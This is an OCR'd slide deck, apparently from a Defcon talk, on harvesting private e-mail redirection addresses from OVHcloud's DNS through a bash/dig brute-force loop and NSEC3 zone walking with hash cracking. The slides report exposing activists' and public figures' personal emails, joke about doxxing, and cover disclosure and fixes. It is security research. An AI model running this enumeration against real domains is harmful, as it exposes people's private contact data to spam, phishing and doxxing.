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DNSSECTION 


What is this about 


E An e-mail privacy breach in the largest French cloud provider 
E The first practical attack based on DNSSEC zone walking 
E A cautionary tale about hash functions 


Why this matters 


E DNS is everywhere, tons of potentially interesting data 
B Zone walking has never been demonstrated in the wild before 


Who we are 


E Hadrien Barral Ecole Normale Supérieure / PSL University 
E Rémi Géraud-Stewart, Ph.D, ENS/PSL, QPSI @ Qualcomm 
B This is our second Defcon talk! 


Done in collaboration with Amaury Barral and David Naccache. 


1. Who’s behind 
skytalks-vidz.com? 


DNS 101 


DNS: Domain Name System 


E Naming system for remote resources 

E Distributed database system (NOT a blockchain ffs) 

E Contains Resource Records (RR) and domain names 

E Resolver: figures out the translation of a domain name into an IP address 


E Zones: subtrees maintained by different people 


Registrars and domain services 101 


Scenario: you want to create a new website: 
E Buy a computer 
Pay for Internet access 
Pay someone to design a fancy website running on your server 


EJ 

= 

E Pay a registrar to get the domain name you want 

E Pay someone to run DNS servers that connect the domain name to your server's IP 
= 


Pay someone to maintain all of this 


All-in-one: cloud hosting! 


OVHcloud 101 


OVHcloud 


E Largest French cloud provider (2nd in Europe) 
E They also sell domains 
E And e-mail redirects with that 


(and they host Wikileaks since 2010, just fyi) 


From: test@dnssection.ovh > 


To: target@yopmail.com — 
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Create a redirection 


You are going to create a redirection for the dnssection.ovh account 
Please enter the redirection information 


pmail.com 


Do not store a copy of the email 


6 Aug 2020 9/40 


E-mail redirects at OVHcloud 


dnssection.ovh 


Automatic renewal scheduled for Apr 2021 


Guides 
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E-mail redirects at OVHcloud 


dnssection.ovh 


Automatic renewal scheduled for Apr 2021 
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What harm can we do? 


E Assume we access the redirection database... 
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What harm can we do? 


E Assume we access the redirection database... 
E Loads of client information: names, e-mails, billing,... 


A few ideas pop to mind: 


E Spam? 

B Password dumps? 

E Targeted attacks? 

E Find weak hosts/email providers? 
E Ammo for social engineering? 
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B Blackmail? 

BE Phishing? 

B Lawsuits? 

E Business recon? 
E.. 
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Sudo bruteforce 


E Get a list of OVHcloud-handled domains 


E Get a sublist of interesting domains and DNS query them (o commoncrawl.org) 
> Works fine for .fr, .ovh, less so for .com... 

B Get redirection records for public emails (bear with us) 
> aka the emails we found on the webpage 

E Bruteforce associated DNS queries for usual e-mail addresses 


{abuse, admin, contact}@example.com 


E Do not get banned by the DNS server 
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How to do this in practice 


E Do not get banned by the DNS server: Rate limiting — several IPs 
E Low-tech version: bash + dig + filesystem 


while read DOMAIN; do 
dig mx ”${DOMAIN}” > "./save/mx/${DOMAIN }” 
dig "at. ${DOMAIN}” > ”./save/at/${DOMAIN}” 
done < "domain_list.txt” 
while read DOMAIN; do 
for NAME in “abuse” “admin” "contact" .. 
EMAIL="${NAME}. at. ${DOMAIN >” 


dig TXT "${EMAIL}” +noall +answer | grep “${EMAIL}.*IN.TXT” 
done 


5 do 


done < "interesting_domain_list. txt” 


Lookie here 


E It works! 
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Lookie here 


EM It works! 

E Considering 14.000 potentially vulnerable domains (mostly .fr TLD), 
E We found about 15.000 email redirects 

E With about 10.000 unique target emails 


Using public emails, we found (private) redirection emails! 


What are we NOT seeing? 


2. Stepping up: 
DNSSECTION 


DNSSEC 101 


E DNSSEC could be the topic of an entire talk 
E Here's what you should know: 
> DNS is famously insecure, needed some fix 
> DNSSEC supported by every “good” modern device 
> Root of trust + tree derivation scheme 
> Meant to ensure authenticity (not privacy) 


E Sometimes require lockpicking skills 


Recent DNSSEC key rollover session 


CRÉREEEER 
PE CCEEEEEN 
7 EEE EE A 


Source: @joao_damas 


Demo 


DNSViz 
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The issue with negative responses 


E Authenticating "example. com is at 1.2.3.4" is easy 

E Authenticating the absence of "bad.example. com" record is ... trickier 
E We obviously cannot put every negative possibility in the zone! 

E NSEC to the rescue 


E Principle: 
>» NSEC signs "there is no domain between 
apple.example.com and  carrot.example. com" 


> Therefore bad. example.com does not exist 


E But now we can enumerate all records! 


Zonewalking with NSEC 


E But now we can enumerate all records! 


> Pick a random name: "fgfrd.example. com" 
> Query the DNS server. 
Answer: nothing between "carrot. example. com" and "good. example. com" 


> Repeat with "gooda. example. com" 
> We do this until we loop, at which point were done! 


NSEC is already obsolete 


E Did you think that’s what we were about to do?... guess again! 
E NSEC zone walking does not work in the real world anymore! 
E Indeed, NSEC is almost not used anymore (sad reacts only) 


Zone walking with NSEC3 


E NSEC3 (RFC6781, RFC5155) 
"The first motivation to deploy NSEC3 — prevention of zone enumeration (...)" 


E NSEC3 in a nutshell: SHA1* (domain) (almost universally) 


> Intuition: same as NSEC but with hashed values instead of real names 
> Should hide the contents (assuming you can’t do anything with hash values) 
> We can still dump the SHA1 hash itself, so ZW still kinda works 


M NSEC3 is what is deployed in the real world currently! 


So let’s attack that :) 


Zone walking with NSEC3 


Assumption: reversing even partially the hash is difficult. 
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Zone walking with NSEC3 
Assumption: reversing even partially the hash is difficult. 
(“Laughs in Bitcoin mining farm*) 


Reality: There are multiple off-the-shelf tools to crack NSEC3 hashes. 


To the best of our knowledge, never been used to dig valuable data 


nsec3walker 


Sudo GPU bruteforce 


Bringing out the GPU rig!!! 


Sudo GPU bruteforce 


Bringing out the GPU rig!!! 


JK, we "only" have this: 


Demo 


hashcat 


Results 


Let’s consider 16.000 interesting DNSSEC hashed records 


Results 
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Results 


Let’s consider 16.000 interesting DNSSEC hashed records 
Un-hashed 88% of them 


Results breakdown 
E 75%: reversed the hash, found an interesting email redirection 
E 13%: reversed the hash, found something else 
E 12%: unhash failed (sad face) 


Let's look into the data ! 


3. All your data are belong to us 


Disclaimer 


E We are not here to doxx people 


E All people names and domain names in the following examples have been 
modified 


With that in mind, let’s dig into the data and tell you what we found :) 


Some statistics 


E Most webmasters’ real addresses... 
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Some statistics 


E Most webmasters’ real addresses... @gmail.com 

E Guessing name from email... about 50% 
E Name couldn't be found on the website... about 66% 
E Email wouldn't otherwise appear in a Google search... about 45% 


E Identify business connections/conflict of interest/fake competitors... about 23% 


Homework: how many of these email addresses have an entry in haveibeenpwned. com? 


Try doxxing scam (and adult) websites! 


Can we use this power for "good"? 


Try doxxing scam (and adult) websites! 
E Don't tell my wife 


Can we use this power for "good"? 


Try doxxing scam (and adult) websites! 
E Don't tell my wife 
E Fail: their email doesn’t disclose their names 
E (but we still have the emails, who's the scammer and who's the scammee now!) 
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E Some famous peoples’ emails (mentioned on Wikipedia) 
E A few personal emails of activists 


E Ona lighter note, a lawyer website with a redirect to... 
my.little.pony. 1xxx@gmail.com 


Anything... serious? 


E Some famous peoples’ emails (mentioned on Wikipedia) 
E A few personal emails of activists 


E Ona lighter note, a lawyer website with a redirect to... 
my.little.pony. 1xxx@gmail.com 


B ~50 redirects for noreplye. Really? 


Caveat! Manual analysis 


E We manually went through hundreds of websites, fishing for names and emails 
> Contact pages 
> Googling names and email addresses 
> Deal with obscene stuff such as Adobe Flash websites 
> 


This is all ‘best-effort’: aka we might have missed public data 
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Disclosure with OVHcloud 


E We called the hotline they said "send a mail to abuse@" 

E First email, including technical details... no reply 

E Call the hotline again to confirm the process, which they do 

E Second email... no reply 

E Get someone working there to ping the right person and forward... 


We're still waiting for a response :) 


Fixing DNSSEC 


EM Use public-key cryptography (“DNSSEC white lies”, RFC 4470, 4471) 
E Either NSEC5? (2014) 


> Initial draft had issues, met with skepticism, not final, not standardised... 
> Latency... 
> Bad track record for the NSEC family 


® Or NSEC8 with digital signatures? 
> Today most DNS servers would use Algorithm13 i.e. ECDSA because of fast signing and 
wide support 
> Verification is slow... so there’s a burden on resolvers 
> Also requires proper management of keys and algorithms... 


… experience shows that DNS servers are bad at it 
— https://eprint.iacr.org/2015/1000. pdf 
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Fixing my redirections 


If you are an OVHCloud customer and use their redirections. 


How do you protect yourself? 


E Protecting the target email is quite easy 
E Protecting the domain email list is more difficult... 


666. Conclusion 


Conclusion 


E Do not store private info in your DNS Zone 
E DNSSEC NSEC3 attacks are practical 
E Push for NSEC5 or ECDSA-alg13 adoption! 


Thats all folks 


Proof of concept on: 
https: //dnssection.ovh 


Your friendly neighbourhood hackers 


contact@dnssection.ovh 


